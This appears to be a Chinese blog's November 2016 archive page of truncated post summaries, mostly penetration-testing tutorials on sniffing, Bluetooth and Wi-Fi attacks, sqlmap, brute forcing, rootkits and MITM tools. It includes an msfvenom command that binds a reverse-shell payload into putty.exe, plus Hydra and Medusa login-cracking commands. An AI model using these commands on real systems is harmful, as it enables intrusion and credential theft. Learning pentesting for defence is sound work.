11 2016 档案
摘要:转载自:http://www.shiyanbar.com/questions/980 系统信息 arch 显示机器的处理器架构(1) uname -m 显示机器的处理器架构(2) uname -r 显示正在使用的内核版本 dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI)
阅读全文
摘要:RFCOMM协议 RFCOMM通过蓝牙L2CAP协议模拟了RS232串口。这会与另一台设备建立一个蓝牙连接,模拟一条普通的串行线缆,使用户能够用其他设备控制这一台设备,通过蓝牙打电话,发短信,读取手机通讯录,以及转接或上网等功能。 我们编写一个扫描器,找出允许未经认证建立RFCOMM通道的设备。 代
阅读全文
摘要:需要安装蓝牙模块:pybluez sudo pip install pybluez 代码
阅读全文
摘要:代码: 运行嗅探脚本: sudo python ftpsniff.py -i wlan0 现在我们登录ftp进行测试 嗅探结果
阅读全文
摘要:1. 简介 scapy是一个可用于网络嗅探的非常强大的第三方库。在网络流量嗅探方面,常用的一些第三方库: scapy在这些库中功能最强大使用也最灵活。具有以下几个特点: 它能够伪造或者解码大量的网络协议数据包,能够发送、捕捉、匹配请求和回复包等等。 它可以很容易地处理一些典型操作,比如端口扫描,tr
阅读全文
摘要:转载 关键字:scrapy 入门教程 爬虫 Spider作者:http://www.cnblogs.com/txw1958/出处:http://www.cnblogs.com/txw1958/archive/2012/07/16/scrapy-tutorial.html 在这篇入门教程中,我们假定你
阅读全文
摘要:代码 运行需要先将网卡设置为混杂模式,如wlan1: 然后以管理员权限运行脚本 运行结果
阅读全文
摘要:代码 运行需要先将网卡设置为混杂模式,如wlan1: 然后以管理员权限运行脚本 运行结果 我们能够捕捉到指引流量的802.11信标帧,TCP,DNS等数据包,这说明我们的无线网卡在正常工作
阅读全文
摘要:一.、在/etc/rc.local文件中添加自启动命令 执行命令: 编辑"/etc/rc.local",添加你想开机运行的命令 运行程序脚本:然后在文件最后一行添加要执行程序的全路径。 例如,每次开机时要执行一个hello.sh,这个脚本放在/usr下面,那就可以在"/etc/rc.local"中加
阅读全文
摘要:#!/usr/bin/env python #--*--coding=utf-8--*-- #打印收到的数据包的源IP和TTL值 from scapy.all import * def testTTL(pkt): try: if pkt.haslayer(IP): ipsrc = pkt.getlayer(IP).src ttl = str(pkt.ttl) ...
阅读全文
摘要:常用格式 实战命令 从文件中获取参数 截取post请求,将其内容保存,如logun.txt (可以用burpsuite,wireshark等) sqlmap -r /path/login.txt -p username sqlmap -r /root/Desktop/post --batch 全自动
阅读全文
摘要:kali蓝牙攻击步骤: 转载自:http://www.whitecell-club.org/?p=1524 背景 刚接触蓝牙,于是玩了那么一下下,现在分享出来,希望能与大家一起学习 先来了解蓝牙哈 (¯▽¯)~(如果哪里错啦,希望大大萌轻点打~(>﹏<)~) 初次相识 蓝牙是一种低功率,近场通信的通
阅读全文
摘要:转载自:http://www.whitecell-club.org/?p=310 随着城市无线局域网热点在公共场所大规模的部署,无线局域网安全变得尤为突出和重要,其中伪AP钓鱼攻击是无线网络中严重的安全威胁之一。 受到各种客观因素的限制,很多数据在WiFi网络上传输时都是明文的,如一般的网页、图片等
阅读全文
摘要:来源:https://www.cqhacker.cn/post-174.html XSSer使用说明 简介: 跨站脚本者是一个自动框架,检测,利用和报告基于Web应用XSS漏洞。它包含几个选项,试图绕过某些过滤器,以及各种特殊的代码注入技术。XSSer由一个遵循GPL V3的团队完成,版权属于psy
阅读全文
摘要:BadTunnel实战之远程劫持任意内网主机流量 http://www.freebuf.com/articles/web/109345.html http://blog.csdn.net/ts__cf/article/details/51725417 打开查看放大图片的时候,使之前的页面跳转到攻击者
阅读全文
摘要:后门 (1)开机自动反弹shell (2)linux后门 Rookit 目前常用的有:t0rn /mafix/enyelkm 等 mafix rootkit Mafix是一款常用的轻量应用级别Rootkits,是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号。URL:
阅读全文
摘要:浏览器攻击 browser_autpwn2 (BAP2) 窃取浏览器登录凭证root@bt:# service apache2 startroot@bt:# setoolkit Office ms10_087漏洞,执行自定义的exe文件 root@kali:~# cd /root/.msf4/loc
阅读全文
摘要:今天给大家介绍一下经典的开源机器学习软件: 编程语言:搞实验个人认为当然matlab最灵活了(但是正版很贵),但是更为前途的是python(numpy+scipy+matplotlib)和C/C++,这样组合既可搞研究,也可搞商业开发,易用性不比matlab差,功能组合更为强大,个人认为,当然R和j
阅读全文
摘要:转载自:http://caiqi1123.blog.163.com/blog/static/5736178120080213836366/ 转载自:http://caiqi1123.blog.163.com/blog/static/5736178120080213836366/ 转载自:http:/
阅读全文
摘要:牛人主页(主页有很多论文代码) Serge Belongie at UC San Diego Antonio Torralba at MIT Alexei Ffros at CMU Ce Liu at Microsoft Research New England Vittorio Ferrari a
阅读全文
摘要:nessus官网:https://www.tenable.com/products/nessus-vulnerability-scanner 下载地址:https://www.tenable.com/products/nessus/select-your-operating-system 安装 启动
阅读全文
摘要:常见捆绑注入payload手法 Payload捆绑注入 msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=x.x.x.x LPORT=xxx -x putty.exe -k -e x86/shikata_ga_
阅读全文
摘要:简介 官方中文网站: http://wifislax.cn/ WiFiSlax 是在Slax基础上定制出来的,由西班牙开发。它包含了各种各样的安全和诊断工具。该发行主要的成名原因是把各种各样的非官方网络驱动程序集成进Linux内核,从而能为大量的有线和无线网卡提供即刻可用的支持。各项性能优于cdli
阅读全文
摘要:常用主机扫描 高级用法 导出结果 脚本扫描 nmap的脚本默认目录为:/usr/share/nmap/scripts/ nmap -sC IP //默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击 nmap --script=vuln IP //扫描常见漏洞 利用Nm
阅读全文
摘要:Google Hacking 参数详解 google hacking 应用举例 Shodan Hacking ZoomEye (钟道之眼) 应用举例 小技巧: 突破封锁检索想要下载的类型文件 语法: index of /。。。 相关内容 shodan服务器安全审计 http://www.freebu
阅读全文
摘要:http://www.ibm.com/developerworks/cn/opensource/os-mediawiki/ 定制wiki http://www.zzbaike.com/wiki/MediaWiki基础设置 修改左侧导航栏字体大小,行距 vim ./skins/vector/compo
阅读全文
摘要:SMB: enum -D -u administrator -f passwords.txt 服务器名 FTP: medusa -H ip.txt -U user.txt -P passwd.txt -M ftp hydra -l 用户名 -P 密码字典 -e ns -vV IP ftp hydra
阅读全文
摘要:介绍 项目地址:https://github.com/stasinopoulos/commix Commix是一个使用Python开发的漏洞测试工具,这个工具是为了方便的检测一个请求是否存在命令注入漏洞,并且对其进行测试,在其作者发布的最新版本中支持直接直接导入burp的历史记录进行检测,大大提高了
阅读全文
摘要:主机扫描 MS08067 :--script=smb-vuln-ms08-067 MS-17-010:--script=smb-vuln-ms17-010 主机服务扫描 路由设备 Web扫描 nikto.pl -h 10.100.100.10 扫描主机10.100.100.10的80口上的WEB
阅读全文
摘要:discover https://github.com/leebaird/discover 使用举例 recon-ng 使用方法: http://www.freebuf.com/articles/web/7385.html recon-ng > use recon/domains-hosts/bin
阅读全文
摘要:简介 辅助评判网页渗透价值的自动化工具。它可以对制定IP和指定端口的所有http(s)服务进行快照,以一种易于浏览阅读的方式展示出来。 安装 git clone https://bitbucket.org/LaNMaSteR53/peepingtom.git 官方手册:https://bitbuck
阅读全文
摘要:#!/bin/bash echo "" echo "==========================================================================" echo "= Pentest Attack Machine Setup =" echo "= Based o...
阅读全文
摘要:一. 安装 项目地址:https://github.com/byt3bl33d3r/MITMf 需要自行手动安装python-nfqueue,pefile模块 这样,我们就可以正常使用 mitmf 了sudo mitmf (一定要使用root权限运行) 下面简要介绍几个MITMf的基础功能,更多扩展
阅读全文
摘要:安装xssf download: svn export http://xssf.googlecode.com/svn/trunk /home/User/xssf install: svn export http://xssf.googlecode.com/svn/trunk ./ --force 连
阅读全文
摘要:安装 Debian / Ubuntu 安装依赖 sudo apt-get update sudo apt-get install curl git curl -sSL https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscrip
阅读全文
摘要:一. 系统状态备份 主要是网络、服务、端口、进程等状态信息的备份工作 二. 断开和限制对外连接 三. 进程查看 定位导致高流量的进程, 然后通过它的行为, 分析是否是黑客挂的马 iftop -nP 查看流量情况 如先用iptraf-ng查下,如果UDP包发的很多,基本都被人装了后门 kill 终止进
阅读全文
浙公网安备 33010602011771号